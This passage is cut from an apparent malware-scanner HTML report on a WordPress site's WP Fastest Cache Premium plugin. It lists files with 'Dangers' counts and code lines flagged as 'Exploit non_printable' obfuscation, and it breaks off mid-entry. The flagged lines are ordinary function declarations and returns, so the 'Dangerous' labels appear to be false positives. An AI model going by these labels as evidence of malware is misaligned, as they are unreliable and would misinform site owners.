</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_514").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.07 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_515" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"unzip_file"</span><span style="color: #007700">)){ </span><span style="color: #0000BB">$GLOBALS</span><span style="color: #007700">[</span><span style="color: #DD0000">'wp_fastest_cache'</span><span style="color: #007700">]-></span><span style="color: #0000BB">rm_folder_recursively</span><span style="color: #007700">(</span><span style="color: #0000BB">WPFC_WP_PLUGIN_DIR</span><span style="color: #007700">.</span><span style="color: #DD0000">"/wp-fastest-cache-premium"</span><span style="color: #007700">); if(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gzopen'</span><span style="color: #007700">)){ </span><span style="color: #0000BB">$res </span><span style="color: #007700">= array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Missing zlib extension"</span><span style="color: #007700">); }else{ </span><span style="color: #0000BB">WP_Filesystem</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wpfc_premium_version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">download_premium</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">"success" </span><span style="color: #007700">=> </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">"error_message" </span><span style="color: #007700">=> </span><span style="color: #DD0000">"Available manual updates only."</span><span style="color: #007700">); </span><span style="color: #FF8000">//bugs</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$res</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_update_premium_callback</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"unzip_file"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_premium_version</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gzopen'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_515").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/statics.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.44 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_516" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_db</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statics</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$extension </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$size </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_516").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/mobile-cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_517" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$htaccess</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_folder_name</span><span style="color: #007700">(){ return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">folder_name</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_wptouch</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_htaccess</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$htaccess</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_folder_name</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 35</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">folder_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_517").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/wp-fastest-cache-premium/pro/library/image.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 42.29 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2020-04-01 16:41:44</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:37</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 129</span><br><table id="file_518" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$images_tmp</span><span style="color: #007700">; } return </span><span style="color: #0000BB">$images</span><span style="color: #007700">; } } </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wpfc_revert_image_ajax_request</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$query_image</span><span style="color: #007700">-></span><span style="color: #0000BB">posts</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]-></span><span style="color: #0000BB">post_count_wpfc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getErrorText</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_total_image_number</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset(</span><span style="color: #0000BB">$errors</span><span style="color: #007700">[</span><span style="color: #0000BB">$id</span><span style="color: #007700">]) ? </span><span style="color: #0000BB">$errors</span><span style="color: #007700">[</span><span style="color: #0000BB">$id</span><span style="color: #007700">] : </span><span style="color: #DD0000">"Unkown error code"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">backup_folder_exist</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">image_list_content</span><span style="color: #007700">(</span><span style="color: #0000BB">$query_images_args </span><span style="color: #007700">= array()){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_output </span><span style="color: #007700">= </span><span style="color: #DD0000">""</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_output </span><span style="color: #007700">.= </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #0000BB">$short_code</span><span style="color: #007700">, </span><span style="color: #0000BB">$datas</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1240</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_output </span><span style="color: #007700">= @</span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_template_path</span><span style="color: #007700">(</span><span style="color: #DD0000">"empty_image_line.html"</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$return_output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">imageList</span><span style="color: #007700">(){ </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1277</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_total_pending_image_number</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_country_code</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$country</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">paging</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statics</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">acceptable_mime_type</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'finfo_open'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'getimagesize'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_url_404</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1362</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">image_arr_unique</span><span style="color: #007700">(</span><span style="color: #0000BB">$images</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$images_tmp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$images</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
